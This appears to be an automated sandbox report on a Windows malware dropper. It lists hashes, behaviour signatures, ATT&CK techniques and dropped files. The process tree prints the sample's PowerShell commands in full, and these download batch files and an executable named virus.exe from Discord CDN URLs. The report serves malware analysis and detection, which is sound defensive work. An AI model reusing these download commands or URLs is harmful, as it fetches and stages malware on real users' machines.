f240023089aeb390afb771116dcd81d753e1270a573caef7118be24ad3799762

Analysis

max time kernel
90s
max time network
92s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
26/01/2024, 11:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
Size

108KB
MD5

5a0002d2a22ceca62c674539b7454ae4
SHA1

8aebc5ca26daace2b5cef162500ffe515fc601e1
SHA256

f240023089aeb390afb771116dcd81d753e1270a573caef7118be24ad3799762
SHA512

083792c1e199deaa86fde46b5b788c50a1b8a3b6bed4493d509aaa5d6c75fad4a631e64e0bc717ec13628d7fc3250d92566a12c934e6c04b1ac5452adbe573a7
SSDEEP

1536:K7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIflAmOHk1xJ:oq6+ouCpk2mpcWJ0r+QNTBfl9e

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe

Signatures

Blocklisted process makes network request 10 IoCs

flow	pid	Process
6	1160	powershell.exe
14	3432	powershell.exe
18	5000	powershell.exe
20	4092	powershell.exe
21	5016	powershell.exe
22	4344	powershell.exe
32	4608	powershell.exe
33	3432	powershell.exe
34	4316	powershell.exe
35	4964	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
1160	powershell.exe
1160	powershell.exe
3432	powershell.exe
3432	powershell.exe
5000	powershell.exe
5000	powershell.exe
4092	powershell.exe
4092	powershell.exe
5016	powershell.exe
5016	powershell.exe
4344	powershell.exe
4344	powershell.exe
4344	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe
4964	powershell.exe
4964	powershell.exe
4964	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	4344	powershell.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	4964	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 3412 wrote to memory of 208	3412	d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe	86
PID 3412 wrote to memory of 208	3412	d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe	86
PID 208 wrote to memory of 1160	208	cmd.exe	91
PID 208 wrote to memory of 1160	208	cmd.exe	91
PID 208 wrote to memory of 3432	208	cmd.exe	105
PID 208 wrote to memory of 3432	208	cmd.exe	105
PID 208 wrote to memory of 5000	208	cmd.exe	93
PID 208 wrote to memory of 5000	208	cmd.exe	93
PID 208 wrote to memory of 4092	208	cmd.exe	96
PID 208 wrote to memory of 4092	208	cmd.exe	96
PID 208 wrote to memory of 5016	208	cmd.exe	99
PID 208 wrote to memory of 5016	208	cmd.exe	99
PID 208 wrote to memory of 4344	208	cmd.exe	101
PID 208 wrote to memory of 4344	208	cmd.exe	101
PID 208 wrote to memory of 4608	208	cmd.exe	104
PID 208 wrote to memory of 4608	208	cmd.exe	104
PID 208 wrote to memory of 3432	208	cmd.exe	105
PID 208 wrote to memory of 3432	208	cmd.exe	105
PID 208 wrote to memory of 4316	208	cmd.exe	106
PID 208 wrote to memory of 4316	208	cmd.exe	106
PID 208 wrote to memory of 4964	208	cmd.exe	107
PID 208 wrote to memory of 4964	208	cmd.exe	107

C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
"C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3412
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4CD8.tmp\4CD9.tmp\4CDA.bat C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3', 'pixel_sides_very_good.mp3')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3 -OutFile pixel_sides_very_good.mp3"
    3⤵
    PID:3432
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat', 'music.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat -OutFile music.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat', 'no.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat -OutFile no.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat', 'DO2.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat -OutFile DO2.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3432
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe', 'VIRUS.exe')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe -OutFile VIRUS.exe"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
042b5a8a2e10f2223489f43a2e39d251

SHA1
a4d41bae887b7c1b43bb461807bf446e0f3ea7cf

SHA256
791ebac5c46c42b2e78cd87ce5a2a9d065da4aa7b15bc14ed795dfbc745b07d6

SHA512
985e438a140d46917dcc5c4d306946bf6b3b01ca274ccaeb470633abf9628d4a615e9732b18c1a5deafeeb5d3d3b7a611a3f1011c60a699e017176a2637c8bd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8dd911a4927cea3092623071c52be8ec

SHA1
3020710472c1ad50f49b0dc6f99be0c14fae9ecb

SHA256
dca719e362ccfc2de8123f56a339583cf3eef38a51848ba3c5a05bc4842f3cc2

SHA512
1060ab744edc351118f893c812b16cf77e3595b6380782a6d4a89387959c707a44fc7c8ededc7aeed17c90902bea40447ab476f6fcc24171e6dd4d2f5981b3ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5f83651980b3f9a647f0b77e4c6b4033

SHA1
d0dc9a515a9b1e6a62b31a9a702340ba069b49d9

SHA256
da7976fc840b464f7ed489505c03c78b84e70246784d4233b5bdbc135989e81d

SHA512
65e16a35897b93c21d05657a7fda17aaa0f7b0c089491cebf4d5207dbd61fcf20ef9ae733452f4747ec22a89b477e86af8b333bf796d14479f67640451c0e585

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9b0d0d79d0bbef03f6d943f6a8af8378

SHA1
e3fb64a682ff88397cbc3f4a48057b5c638fad5d

SHA256
9191424a02c75865d3c4af64b98ad85ededa47d09182101031cdcbe2fea69843

SHA512
aae89565e6b6ac9508bfa08b1fda7ac6bc763737eeaa5d13a74e96791d8e75139991c5696ff94e784cf410b2536aa4f98791612d73461f01675dda8c18f2db0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
69c5c09eff5cdd0c7ae3f07ac65c3fc4

SHA1
43e5f66ee2340fe9e4cf4340b7e231f7f6a52113

SHA256
b0d23d64d7b2d0bebf3137b714e0ed9c410abc26f272742092f95ea9a8736ea6

SHA512
2239a5ff837f104ac8328fc876d4ded7d9417f1a7da424456d3385329902b6ead4a5901be938f4fa657e2868fb99b3d93e55574bcc4e87559f24042bd7755194

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fc806d8ebd4a398cd5dc4a313bc1588b

SHA1
0657bb80648a1e94571f70024ca81ddb0cbcca9c

SHA256
3f0ecc204077e7236a0b91b31a1fa8189b22154020b4ad9852674887881b4fd5

SHA512
49f1476dd8d09a3c808eb4ca4b57392b9b73e12ea63bc151d6a8361051947e0692225ecb6e137c3f9134dad05b6cd879d37fcf23b79f0a08646bc3b919078345

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b0cfdab278bf3db6d14817b1e701e4ee

SHA1
7ec7d56340dcaff7b6bf3d0e4b35be5bd57e87b8

SHA256
0554687e2254846915ac9d734989c77cfc0417bdd6607dd64dde2fb2dcc55854

SHA512
40a621b3ef79c9f74c937b4f04ef18bcc78bc7436c2035885bd8651b4ffc072152c6e87087be432c43860256c5e89ef33d57bb27822d36f18b8b9bda9208d4ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\4CD8.tmp\4CD9.tmp\4CDA.bat

Filesize
18KB

MD5
da14901fbd42e828503cc0f75847af52

SHA1
db49087447161b0fc6ee882dfc6906d1a9d1b96e

SHA256
8c2ff4915c53918275152048cf955f70fa23c531c88bd91f1e9b32c818bb9b7f

SHA512
8e8196a15a09f0b18e8d4e8d7d1c43c56c67ff2a32e58dc9746ea8d7a75679d38f255a683ea1c0d013d27a630e06f49f6e365a29cccaa327096669ed8d3d9154

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ngthmpik.rvt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1160-15-0x0000020C45F50000-0x0000020C45F60000-memory.dmp

Filesize
64KB

Download
memory/1160-17-0x0000020C45F50000-0x0000020C45F60000-memory.dmp

Filesize
64KB

Download
memory/1160-20-0x00007FFB48210000-0x00007FFB48CD1000-memory.dmp

Filesize
10.8MB

Download
memory/1160-16-0x0000020C45F50000-0x0000020C45F60000-memory.dmp

Filesize
64KB

Download
memory/1160-13-0x0000020C45F10000-0x0000020C45F32000-memory.dmp

Filesize
136KB

Download
memory/1160-14-0x00007FFB48210000-0x00007FFB48CD1000-memory.dmp

Filesize
10.8MB

Download
memory/3432-34-0x00000195A2EE0000-0x00000195A2EF0000-memory.dmp

Filesize
64KB

Download
memory/3432-40-0x00007FFB48210000-0x00007FFB48CD1000-memory.dmp

Filesize
10.8MB

Download
memory/3432-38-0x00000195A2EE0000-0x00000195A2EF0000-memory.dmp

Filesize
64KB

Download
memory/3432-37-0x00000195A2EE0000-0x00000195A2EF0000-memory.dmp

Filesize
64KB

Download
memory/3432-134-0x000001DE800A0000-0x000001DE800B0000-memory.dmp

Filesize
64KB

Download
memory/3432-35-0x00000195BDEB0000-0x00000195BE656000-memory.dmp

Filesize
7.6MB

Download
memory/3432-135-0x000001DE800A0000-0x000001DE800B0000-memory.dmp

Filesize
64KB

Download
memory/3432-138-0x00007FFB48170000-0x00007FFB48C31000-memory.dmp

Filesize
10.8MB

Download
memory/3432-132-0x00007FFB48170000-0x00007FFB48C31000-memory.dmp

Filesize
10.8MB

Download
memory/3432-32-0x00000195A2EE0000-0x00000195A2EF0000-memory.dmp

Filesize
64KB

Download
memory/3432-31-0x00007FFB48210000-0x00007FFB48CD1000-memory.dmp

Filesize
10.8MB

Download
memory/4092-67-0x000001F6CE400000-0x000001F6CE410000-memory.dmp

Filesize
64KB

Download
memory/4092-68-0x000001F6CE400000-0x000001F6CE410000-memory.dmp

Filesize
64KB

Download
memory/4092-66-0x00007FFB48210000-0x00007FFB48CD1000-memory.dmp

Filesize
10.8MB

Download
memory/4092-73-0x00007FFB48210000-0x00007FFB48CD1000-memory.dmp

Filesize
10.8MB

Download
memory/4092-70-0x000001F6CE400000-0x000001F6CE410000-memory.dmp

Filesize
64KB

Download
memory/4092-71-0x000001F6CE400000-0x000001F6CE410000-memory.dmp

Filesize
64KB

Download
memory/4316-151-0x00000203F5770000-0x00000203F5780000-memory.dmp

Filesize
64KB

Download
memory/4316-150-0x00000203F5770000-0x00000203F5780000-memory.dmp

Filesize
64KB

Download
memory/4316-149-0x00007FFB48170000-0x00007FFB48C31000-memory.dmp

Filesize
10.8MB

Download
memory/4316-152-0x00000203F5770000-0x00000203F5780000-memory.dmp

Filesize
64KB

Download
memory/4316-155-0x00007FFB48170000-0x00007FFB48C31000-memory.dmp

Filesize
10.8MB

Download
memory/4316-153-0x00000203F5770000-0x00000203F5780000-memory.dmp

Filesize
64KB

Download
memory/4344-101-0x00000297200E0000-0x00000297200F0000-memory.dmp

Filesize
64KB

Download
memory/4344-100-0x00000297200E0000-0x00000297200F0000-memory.dmp

Filesize
64KB

Download
memory/4344-99-0x00007FFB482E0000-0x00007FFB48DA1000-memory.dmp

Filesize
10.8MB

Download
memory/4344-103-0x00000297200E0000-0x00000297200F0000-memory.dmp

Filesize
64KB

Download
memory/4344-106-0x00007FFB482E0000-0x00007FFB48DA1000-memory.dmp

Filesize
10.8MB

Download
memory/4344-104-0x00000297200E0000-0x00000297200F0000-memory.dmp

Filesize
64KB

Download
memory/4608-120-0x000001D05F860000-0x000001D05F870000-memory.dmp

Filesize
64KB

Download
memory/4608-107-0x00007FFB48170000-0x00007FFB48C31000-memory.dmp

Filesize
10.8MB

Download
memory/4608-118-0x000001D05F860000-0x000001D05F870000-memory.dmp

Filesize
64KB

Download
memory/4608-113-0x000001D05F860000-0x000001D05F870000-memory.dmp

Filesize
64KB

Download
memory/4608-122-0x00007FFB48170000-0x00007FFB48C31000-memory.dmp

Filesize
10.8MB

Download
memory/4964-167-0x00000178A36D0000-0x00000178A36E0000-memory.dmp

Filesize
64KB

Download
memory/4964-170-0x00000178A36D0000-0x00000178A36E0000-memory.dmp

Filesize
64KB

Download
memory/4964-172-0x00007FFB48170000-0x00007FFB48C31000-memory.dmp

Filesize
10.8MB

Download
memory/4964-169-0x00000178A36D0000-0x00000178A36E0000-memory.dmp

Filesize
64KB

Download
memory/4964-166-0x00007FFB48170000-0x00007FFB48C31000-memory.dmp

Filesize
10.8MB

Download
memory/5000-50-0x00007FFB48210000-0x00007FFB48CD1000-memory.dmp

Filesize
10.8MB

Download
memory/5000-53-0x0000020A6DFC0000-0x0000020A6DFD0000-memory.dmp

Filesize
64KB

Download
memory/5000-55-0x00007FFB48210000-0x00007FFB48CD1000-memory.dmp

Filesize
10.8MB

Download
memory/5000-51-0x0000020A6DFC0000-0x0000020A6DFD0000-memory.dmp

Filesize
64KB

Download
memory/5016-84-0x00007FFB482E0000-0x00007FFB48DA1000-memory.dmp

Filesize
10.8MB

Download
memory/5016-85-0x00000225EA560000-0x00000225EA570000-memory.dmp

Filesize
64KB

Download
memory/5016-86-0x00000225EA560000-0x00000225EA570000-memory.dmp

Filesize
64KB

Download
memory/5016-88-0x00007FFB482E0000-0x00007FFB48DA1000-memory.dmp

Filesize
10.8MB

Download